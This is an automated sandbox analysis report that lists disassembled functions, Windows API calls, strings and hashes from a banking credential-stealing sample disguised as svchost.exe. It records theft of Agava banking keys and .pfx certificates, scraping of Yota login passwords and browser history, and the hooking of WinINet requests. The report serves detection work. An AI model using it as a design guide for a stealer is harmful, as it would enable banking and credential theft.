                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
                                                                                                                                                                                                            • String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Wu$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
                                                                                                                                                                                                            • API String ID: 1263884631-2805521981
                                                                                                                                                                                                            • Opcode ID: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
                                                                                                                                                                                                            • Instruction ID: 93fde4a2732c95acd5d75c4d9674dba764e2e6ed506e508d1241570a2ef67f6d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08561d88b8cbc3e258832f2eacacf9f89692b588722b0ab1872e5e37efeff1f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D651E031A406596BEF229B349C1CBAA3B9CAF85349F144A94ECC6D7140DF71C648CBA2
                                                                                                                                                                                                            Function 02C753E0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 271memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,75572F00,00000000,75570F00), ref: 02C75405
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C7543F
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C7544C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C7546B
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02C7548C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,02C82665,00000001), ref: 02C7550B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7550E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7551B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7551E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C75533
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FilePath$FolderProcess$AttributesBackslashCreateDeleteFreeValidate
                                                                                                                                                                                                            • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                            • API String ID: 772302041-762728116
                                                                                                                                                                                                            • Opcode ID: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                            • Instruction ID: 22586ef335f1538914494fa27962e674e6c067f21e5578ca48d3104f23decb94
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B913B70E40359ABDB22CF60DC84FEABBB9EF44744F844584E945AB180DB70AB45CB90
                                                                                                                                                                                                            Function 02C79B50 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P0Wu$open$taskmgr
                                                                                                                                                                                                            • API String ID: 0-1571188809
                                                                                                                                                                                                            • Opcode ID: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
                                                                                                                                                                                                            • Instruction ID: c90015fce84a43227881360fce1100c2b29f9ed26db122529d9413665eac2634
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51c55ab250984b1378fc020d1e451df96e5a679c7bc0090d7aa38ddf5273bc60
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B91C431A80284EBD712DF69ED49FABBB7CEBC5711F104B95F90597281C730A961CBA0
                                                                                                                                                                                                            Function 02C91BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 273stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                              • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02C91BC6
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C91BE5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91BF7
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91C08
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02C91C50
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91C64
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02C91CA4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91CB2
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C91CC7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C91D64
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91D9D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID: .ini$6d1da6b7$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                            • API String ID: 2651364649-579338516
                                                                                                                                                                                                            • Opcode ID: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
                                                                                                                                                                                                            • Instruction ID: 8530997ed578a2fdf82a443dd6cfe597021f2c815232704f86ca57ebae2b196d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f157bce3519caa51ccfa1cf44a88d0117712d04f1532c881308efa320934b9bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15A1193194429E8FDF17CB249C5DBEA7BE9EF45300F1846E4E949D7240EBB19A48CB90
                                                                                                                                                                                                            Function 02C89ED0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 214fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89F18
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6d1da3b2$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2920098687-997701514
                                                                                                                                                                                                            • Opcode ID: d62764c66fd3447da8bde9fdfd18aef49824ac741345b335b420c89d97344146
                                                                                                                                                                                                            • Instruction ID: e060a6dc4a62d9af18e8e24f33a177b5cb2f0831524c4b233497ef898910154f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d62764c66fd3447da8bde9fdfd18aef49824ac741345b335b420c89d97344146
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74614431A406819FE7165B749C59B7B3BE8AF8974AF188699FC87CB341CB71CA04C790
                                                                                                                                                                                                            Function 02C89EF8 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89F18
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6d1da3b2$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2920098687-997701514
                                                                                                                                                                                                            • Opcode ID: aadf2567ab0a4f7b18be7ebb7b05b9d94617d3bcaaf977602a38d5466b38f0ba
                                                                                                                                                                                                            • Instruction ID: 058d2e19cc3ae5a7eb33f0f5158297650a9a262ff920cb78621d39c29839aa8a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aadf2567ab0a4f7b18be7ebb7b05b9d94617d3bcaaf977602a38d5466b38f0ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52615831A402919BE7165B749C59B7B3BE8AF8A74AF188599FC87C7341CB31CD05C790
                                                                                                                                                                                                            Function 02C906E0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C906FE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C9073F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C9077B
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6d1da7aa), ref: 02C90790
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C9079A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C907A2
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C907B3
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C907BA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C907F2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C907FF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa,?,?), ref: 02C90847
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: 6d1da7aa$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1668326001-4290117164
                                                                                                                                                                                                            • Opcode ID: 5e2089774b1b1340c39a14fda9a1cfde2978c900580c1487d6aa29c75874ab81
                                                                                                                                                                                                            • Instruction ID: b2282085784792c57ea597b4e053d02bf983241986ebfcbaf99e989dbca682b6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2089774b1b1340c39a14fda9a1cfde2978c900580c1487d6aa29c75874ab81
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E714731A402999FEB128B349C5CBAB7BE8EF85704F144AD4E985DB241DF71CA49CF90
                                                                                                                                                                                                            Function 02C8EB60 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 215COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8EB7E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA248), ref: 02C8EBAB
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8EBED
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8EBF3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8EBFB
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8EC0C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8EC13
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA248,?,?), ref: 02C8EC87
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C8ECC5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: 6D1DA248$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2217318736-1038123260
                                                                                                                                                                                                            • Opcode ID: 51d1b8c9fa17c033bec282f951e1662f180fe039207c4c48e6daccd246365cc4
                                                                                                                                                                                                            • Instruction ID: 2ed45fa89f3537049a4328ad7dd3c48984d289ba92d9bddbc3343abe1d9e4ec7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d1b8c9fa17c033bec282f951e1662f180fe039207c4c48e6daccd246365cc4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F57127319006955FDB129B349C58BEB7BE8AF85308F14CA95FD86CB241EB70DA49CB90
                                                                                                                                                                                                            Function 02C842C0 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 182memorysleepthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C832F0: IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                              • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                              • Part of subcall function 02C832F0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                              • Part of subcall function 02C832F0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                              • Part of subcall function 02C832F0: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                              • Part of subcall function 02C832F0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                              • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C842E1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C842F6
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C84315
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C8432C
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C84344
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843AC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C843AF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843BC
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C843BF
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02C8440E
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000338,00000000), ref: 02C84438
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTerminateThreadTickValidateValue_snprintf
                                                                                                                                                                                                            • String ID: 92F35C4Ca$C:\Windows\apppatch\svchost.exe$id=1&post=%u
                                                                                                                                                                                                            • API String ID: 3337567932-2522799052
                                                                                                                                                                                                            • Opcode ID: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
                                                                                                                                                                                                            • Instruction ID: bbd2204ae303518fbca62e2b7ffa70cbcb0041e8f9508d5356b3ba8fd619da67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4513B71E802466BE735ABB0AC49FBA7B6DDF84B08F048694F609D71C1EB70D504CB60
                                                                                                                                                                                                            Function 02C800B0 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7556F550,00000000), ref: 02C800CE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02C800E4
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,75571620), ref: 02C800FC
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02C8011E
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02C8012A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02C80140
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02C8015C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02C80178
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02C80194
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02C801B0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02C801CC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02C801E8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02C80204
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02C80220
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                            • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                            • API String ID: 1705253364-835984666
                                                                                                                                                                                                            • Opcode ID: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                            • Instruction ID: d3d08d81a9f4b24674397dfb42814877a6d3e56e70194442aa7d9c041c26f86b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9931C771BC031A35FA2276744C46FAF975E4F85F99F018534B803B2445DBA6E70989B8
                                                                                                                                                                                                            Function 02C8DA40 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02C8DA6D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8DAAE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8DAE2
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6D1DA2CA), ref: 02C8DAF7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8DB01
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8DB09
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DB1A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8DB21
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DB5B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8DB68
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA,02CBDAD8,02CBDAD9), ref: 02C8DBA9
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8DBE4
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8DBEE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8DBF6
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DC07
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8DC0E
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DC4B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8DC58
